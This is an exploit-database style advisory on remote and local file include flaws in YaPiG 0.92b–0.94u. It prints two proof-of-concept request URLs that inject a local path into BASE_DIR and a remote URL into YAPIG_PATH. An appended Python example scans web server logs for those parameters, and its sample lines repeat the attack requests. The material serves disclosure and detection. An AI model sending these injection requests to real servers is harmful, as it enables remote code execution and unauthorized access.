Vendor: YaPiG
By: SecurityFocus
CVSS: 7.5 (HIGH)
Title: Remote and Local File Include Vulnerabilities
CWE: 94
Product Name: YaPiG
Affected Version From: 0.92b
Affected Version To: 0.94u
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

YaPiG Remote and Local File Include Vulnerabilities

YaPiG is affected by remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/13874/info

YaPiG is affected by remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

This issue is reported to affect YaPiG versions 0.92b, 0.93u and 0.94u; earlier versions may also be affected. 

Version 0.92b: http://www.example.com/global.php?BASE_DIR=/local/path/to/global-gen.php
Version 0.93u/0.94u: http://www.example.com/last_gallery.php?YAPIG_PATH=http://www.example.com/
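
For defenders reviewing web server logs, the following added example (not part of the advisory or of YaPiG) flags requests that set the two parameters named above and classifies the supplied value as a local path or a remote URL. It assumes combined-format access logs and that the parameter arrives in the query string; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> parameter pairs taken from the advisory above.
WATCHED = {"global.php": "BASE_DIR", "last_gallery.php": "YAPIG_PATH"}

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that starts with a URL scheme points at a remote resource.
REMOTE_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)


def classify(log_line):
    """Return (script, param, kind) if the line sets a watched parameter, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1].lower()
    param = WATCHED.get(script)
    if param is None:
        return None
    # parse_qsl percent-decodes, so encoded values are compared in decoded form.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key == param:
            remote = REMOTE_RE.match(value) or value.startswith("//")
            return (script, param, "remote" if remote else "local")
    return None


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jun/2005:10:00:00 +0000] "GET /gallery/view.php?gid=3 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jun/2005:10:00:05 +0000] "GET /global.php?BASE_DIR=/local/path/to/global-gen.php HTTP/1.1" 200 311',
    '192.0.2.44 - - [01/Jun/2005:10:00:09 +0000] "GET /last_gallery.php?YAPIG_PATH=http%3A%2F%2Fwww.example.com%2F HTTP/1.1" 200 298',
    '192.0.2.10 - - [01/Jun/2005:10:00:12 +0000] "GET /last_gallery.php HTTP/1.1" 200 4410',
]


def scan(lines):
    """Return the classification of every line that sets a watched parameter."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Neither script should normally receive these parameters from a client, so any hit is worth reviewing; values sent in a POST body or cookie do not appear in access logs and are not covered here.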